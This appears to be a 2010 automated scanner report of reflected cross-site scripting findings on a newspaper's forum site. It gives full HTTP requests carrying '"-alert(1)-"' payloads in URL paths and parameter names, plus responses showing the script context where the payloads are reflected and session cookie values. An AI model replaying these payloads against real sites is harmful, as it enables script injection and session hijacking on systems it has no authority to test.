Content-Type: text/html; charset=utf-8
Content-Length: 28628
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72dff"-alert(1)-"3eb0ed22cc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e61ea"-alert(1)-"f6fde09b897 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab22e"-alert(1)-"d193185f86e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicab22e"-alert(1)-"d193185f86e/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:08 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22276
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title ...[SNIP]... anguage="JavaScript">
if (typeof s != 'undefined') {
s.pageName="";
s.channel="Forums";
s.prop1="Home";
s.prop2=s.prop1 + " / Opinion";
s.prop3=s.prop2 + " / Forums";
s.prop4=s.prop3 + " / topicab22e"-alert(1)-"d193185f86e/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose";
s.prop9=getCiQueryString("SOURCE");
s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
s. ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f6eb"-alert(1)-"db61396b3da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose5f6eb"-alert(1)-"db61396b3da HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22276
1.45. http://forums.mercurynews.com/topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0fec"-alert(1)-"b2737086bf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/40th-annivesary-celebration-post-your-memorable-moments-at-childrens-musical-theatre-san-jose?d0fec"-alert(1)-"b2737086bf5=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:50 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22243
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e42c8"-alert(1)-"227f159106e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topice42c8"-alert(1)-"227f159106e/645-sri-lanka-and-thailand-9-1-2010 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:18 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22160
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c06"-alert(1)-"12bdca9849b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/645-sri-lanka-and-thailand-9-1-201051c06"-alert(1)-"12bdca9849b HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:28 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22160
1.48. http://forums.mercurynews.com/topic/645-sri-lanka-and-thailand-9-1-2010 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/645-sri-lanka-and-thailand-9-1-2010
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b712"-alert(1)-"c150a5b4989 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/645-sri-lanka-and-thailand-9-1-2010?9b712"-alert(1)-"c150a5b4989=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:06 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46103
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b094c"-alert(1)-"6bbb6d77a1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicb094c"-alert(1)-"6bbb6d77a1d/about-gold-price-and-inflation HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22150
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfbe9"-alert(1)-"886bc9b8793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/about-gold-price-and-inflationcfbe9"-alert(1)-"886bc9b8793 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22150
1.51. http://forums.mercurynews.com/topic/about-gold-price-and-inflation [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/about-gold-price-and-inflation
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8247c"-alert(1)-"6f9bb8c880e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/about-gold-price-and-inflation?8247c"-alert(1)-"6f9bb8c880e=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 95450
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ef8c"-alert(1)-"b016d693cff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic6ef8c"-alert(1)-"b016d693cff/al-qaida-is-us-puppet HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22132
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9afde"-alert(1)-"410d6a4b262 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/al-qaida-is-us-puppet9afde"-alert(1)-"410d6a4b262 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22132
1.54. http://forums.mercurynews.com/topic/al-qaida-is-us-puppet [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/al-qaida-is-us-puppet
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83c90"-alert(1)-"f57460e9cf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/al-qaida-is-us-puppet?83c90"-alert(1)-"f57460e9cf9=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 98974
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d738f"-alert(1)-"6fbedbd10eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicd738f"-alert(1)-"6fbedbd10eb/bp-oil-spill-was-created-to-push-war-on-iran HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:12 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22178
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e2ed"-alert(1)-"68b78d5cb8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/bp-oil-spill-was-created-to-push-war-on-iran1e2ed"-alert(1)-"68b78d5cb8c HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:21 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22178
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbc8e"-alert(1)-"7edf3fe785f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/bp-oil-spill-was-created-to-push-war-on-iran?dbc8e"-alert(1)-"7edf3fe785f=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32485
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e534b"-alert(1)-"d6330c89b46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topice534b"-alert(1)-"d6330c89b46/ferret-theory-lv HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:02 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22122
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title ...[SNIP]... anguage="JavaScript">
if (typeof s != 'undefined') {
s.pageName="";
s.channel="Forums";
s.prop1="Home";
s.prop2=s.prop1 + " / Opinion";
s.prop3=s.prop2 + " / Forums";
s.prop4=s.prop3 + " / topice534b"-alert(1)-"d6330c89b46/ferret-theory-lv";
s.prop9=getCiQueryString("SOURCE");
s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
s.events="event1";
s.eVar2=getCiQueryString("SOURCE");
s.eVar4=s.pageName;
s ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf2d6"-alert(1)-"4e7735b0a0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/ferret-theory-lvcf2d6"-alert(1)-"4e7735b0a0d HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:12 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22122
1.60. http://forums.mercurynews.com/topic/ferret-theory-lv [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/ferret-theory-lv
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fe24"-alert(1)-"022a6eab7a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/ferret-theory-lv?7fe24"-alert(1)-"022a6eab7a3=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
